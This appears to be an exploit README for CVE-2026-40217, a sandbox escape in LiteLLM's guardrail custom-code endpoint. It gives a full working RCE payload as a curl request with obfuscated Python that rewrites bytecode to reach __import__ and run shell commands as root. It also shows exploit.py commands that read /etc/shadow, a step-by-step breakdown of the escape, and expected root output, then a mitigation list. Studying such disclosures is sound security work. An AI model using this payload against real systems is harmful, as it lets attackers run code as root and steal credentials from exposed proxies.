Share
## https://sploitus.com/exploit?id=B01AF870-0BB7-5045-8F8B-19C856066EE7
# CVE-2026-40217 โ LiteLLM Guardrail Sandbox Escape
> **LiteLLM** `POST /guardrails/test_custom_code` โ Sandbox Escape leading to **Remote Code Execution (RCE)** as **root** in default Docker deployment.
| Field | Value |
|-------|-------|
| CVE | **CVE-2026-40217** |
| CVSS | **8.8 (HIGH)** โ `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| CWE | CWE-913 (Improper Control of Dynamically-Managed Code Resources) / CWE-94 |
| Affected | LiteLLM โค **2026-04-08** (pre-v1.83.11) |
| Fixed | **v1.83.11+** (replaced hand-rolled sandbox with `RestrictedPython`) |
| Discoverer | Markus Vervier โ [X41 D-Sec GmbH](https://x41-dsec.de) |
| Published | 2026-04-08 |
| Link | [X41 Advisory](https://x41-dsec.de/lab/advisories/x41-2026-001-litellm/) โข [GHSA-wxxx-gvqv-xp7p](https://github.com/advisories/GHSA-3926-2jvf-fg29) โข [oss-security](https://www.openwall.com/lists/oss-security/2026/04/09/1) |
---
## Description
The `POST /guardrails/test_custom_code` endpoint in LiteLLM allows authenticated users to submit arbitrary Python code for guardrail testing. The endpoint attempts to restrict dangerous operations using **regex-based source code filtering**, but this can be completely bypassed using **CPython bytecode rewriting techniques**, leading to **arbitrary code execution** in the proxy process. In the default Docker image, the proxy runs as **root**, compounding the impact.
---
## Proof of Concept
### Prerequisites
```bash
# Install Python dependencies (required by exploit.py)
pip install -r requirements.txt
```
### Quick Start (Docker)
> **โ ๏ธ Important:** The `docker-compose.yml` pins the vulnerable image to a specific digest
> (`sha256:7c311546...`) from March 22, 2026. Do **not** change the tag to `main-latest`
> or any newer version โ later images may already contain the fix (RestrictedPython)
> even if the version number suggests otherwise (e.g., `v1.83.10-stable` was rebuilt
> post-patch and is **not** vulnerable).
```bash
# 1. Install dependencies (if not already done)
pip install -r requirements.txt
# 2. Start a vulnerable LiteLLM instance
docker compose up -d
# 3. Run the exploit
python3 exploit/exploit.py --target http://localhost:4000 --key "sk-litellm-master-key"
# 4. Read sensitive files (change the --cmd argument)
python3 exploit/exploit.py --target http://localhost:4000 --key "sk-litellm-master-key" \
--cmd "cat /etc/shadow"
# Or using curl directly
curl -s -X POST \
-H "Authorization: Bearer sk-litellm-master-key" \
-H "Content-Type: application/json" \
http://localhost:4000/guardrails/test_custom_code \
-d '{
"custom_code": "def apply_guardrail(inputs, request_data, input_type):\n obj = str.mro()[1]\n def g(fn):\n yield fn.placeholder\n c = g(None).gi_code\n gn = \"_\"+\"_gl\"+\"ob\"+\"als\"+\"_\"+\"_\"\n cn = \"_\"+\"_co\"+\"de_\"+\"_\"\n obj.__setattr__(g, cn, c.replace(co_names=(gn,)))\n for v in g(http_get):\n gd = v\n break\n bn = \"_\"+\"_bu\"+\"ilt\"+\"ins\"+\"_\"+\"_\"\n imp = gd[bn][\"_\"+\"_im\"+\"po\"+\"rt_\"+\"_\"]\n return {\"rce\": imp(\"os\").popen(\"id\").read()}",
"test_input": {"messages": [{"role": "user", "content": "test"}]}
}'
```
### Expected Result
```json
{"success":true,"result":{"rce":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)\n"},"error":null,"error_type":null}
```
---
## Sandbox Escape Technique (6 Steps)
| Step | Technique | Code |
|------|-----------|------|
| 1 | **Regex bypass** via string concatenation | `"_"+"_gl"+"ob"+"als"+"_"+"_"` |
| 2 | Obtain `object` class via `str.mro()[1]` | `obj = str.mro()[1]` |
| 3 | Access generator code object via `gi_code` | `c = g(None).gi_code` |
| 4 | Swap function `__code__` via `object.__setattr__` | `obj.__setattr__(g, cn, c.replace(co_names=(gn,)))` |
| 5 | Extract real builtins from `http_get.__globals__` | `imp = gd["__builtins__"]["__import__"]` |
| 6 | Achieve RCE via `os.popen` | `imp("os").popen("id").read()` |
---
## Repository Structure
```
CVE-2026-40217/
โโโ README.md # This file
โโโ docker-compose.yml # One-command vulnerable environment
โโโ requirements.txt # Dependencies
โโโ exploit/
โ โโโ exploit.py # Full exploit script
โ โโโ payload.py # Bytecode payload module
โโโ docs/
โ โโโ advisory.md # Translated advisory details
โโโ screenshots/ # Proof screenshots
```
---
## Mitigation
1. **Upgrade** to LiteLLM **v1.83.11+** (uses `RestrictedPython` instead of hand-rolled sandbox)
2. **Block** `/guardrails/test_custom_code` at your reverse proxy / API gateway
3. **Restrict** master key to trusted administrators only
4. **Run as non-root** in Docker: `docker run --user 1000:1000 ...`
5. **Do not** expose the management interface to untrusted networks
---
## References
- [X41 D-SEC Advisory x41-2026-001](https://x41-dsec.de/lab/advisories/x41-2026-001-litellm/)
- [GitHub Advisory GHSA-wxxx-gvqv-xp7p](https://github.com/advisories/GHSA-3926-2jvf-fg29)
- [GitLab Advisory](https://advisories.gitlab.com/pypi/litellm/CVE-2026-40217/)
- [oss-security disclosure](https://www.openwall.com/lists/oss-security/2026/04/09/1)
- [NVD Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-40217)
---
> **Disclaimer:** This content is provided for **educational purposes and authorized security testing only.**